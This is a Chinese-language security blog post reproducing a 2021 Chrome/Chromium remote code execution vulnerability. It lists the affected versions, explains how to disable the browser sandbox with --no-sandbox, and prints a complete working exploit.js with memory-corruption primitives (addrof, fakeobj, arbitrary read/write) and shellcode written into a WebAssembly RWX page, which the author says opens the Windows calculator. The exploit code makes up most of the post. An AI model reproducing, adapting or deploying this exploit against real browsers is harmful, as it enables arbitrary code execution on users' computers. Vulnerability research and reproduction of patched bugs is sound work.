Google Chrome远程代码执行0Day漏洞复现

更多黑客技能 公众号：白帽子左一

作者：掌控安全-gjmvp

0x00 前言

前几天听说了这个漏洞一直没有机会复现，今天决定复现一下，参考了几篇文章之后自己就开始动手进行了复现

0x01 漏洞概述

2021年04月13日，360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情，

漏洞等级：严重
漏洞评分：9.8

Chrome是四大浏览器内核之一，统称为Chromium内核或Chrome内核。

chrome是开放源代码的，目前采用Chrome内核的浏览器有著名的Google Chrome、360极速、搜狗、新版opera、yandex还有微软旗下Microsoft Edge等，总之，chrome内核在浏览器份额中，占比非常大

漏洞会影响当前版本的Google Chrome，Microsoft Edge和其他可能基于Chromium的浏览器。

不过需要关闭浏览器的沙盒，也就是说，chrome的沙盒可以拦截该远程代码执行漏洞，并且目前Google chrome最新版本 90.0.4430.72已经被修复

0x02漏洞条件

漏洞所需环境条件如下：

浏览器版本<= 89.0.4389.114

此漏洞无法逃逸沙箱，需要关闭浏览器的沙箱(SandBox)功能【此功能默认开启】

关闭沙箱方法：

1.在谷歌浏览器快捷方式右键点击属性，然后点击快捷方式，在目标的后面添加上
–no-sandbox

2.然后点击应用，确定

3.打开浏览器看到提示，即成功关闭sandbox

0x03漏洞验证

漏洞POC：

https://github.com/r4j0x00/exploits/tree/master/chrome-0day

这个脚本的作用是打开Windows10的计算器

exploit.js

/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
3. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.
4. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);
function ftoi(val) {
     
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
     
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
const _arr = new Uint32Array([2**31]);
function foo(a) {
     
    var x = 1;
        x = (_arr[0] ^ 0) + 1;
        x = Math.abs(x);
        x -= 2147483647;
        x = Math.max(x, 0);
        x -= 1;
        if(x==-1) x = 0;
        var arr = new Array(x);
        arr.shift();
        var cor = [1.1, 1.2, 1.3];
        return [arr, cor];
}
for(var i=0;i<0x3000;++i)
    foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
     
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}
function fakeobj(k) {
     
    cor[0] = itof(k);
    return arr[idx+1];
}
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);
function arbread(addr) {
     
    if (addr % 2n == 0) {
     
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}
function arbwrite(addr, val) {
     
    if (addr % 2n == 0) {
     
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}
function copy_shellcode(addr, shellcode) {
     
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
     
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

exploit.html

<script src="exploit.js"></script>

然后我们在本地双击打开构建的POC测试脚本，就可以发现成功的弹出了计算器

0x04总结

由于Google Chrome 浏览器的沙箱机制是默认开启的，也就是说，正常使用浏览器，是不会存在问题的。

而且我自己在复现的过程中，发现这个漏洞并没有那么容易复现，在测试很多次之后才复现成功，个人感觉在实际利用过程中还是比较困难的。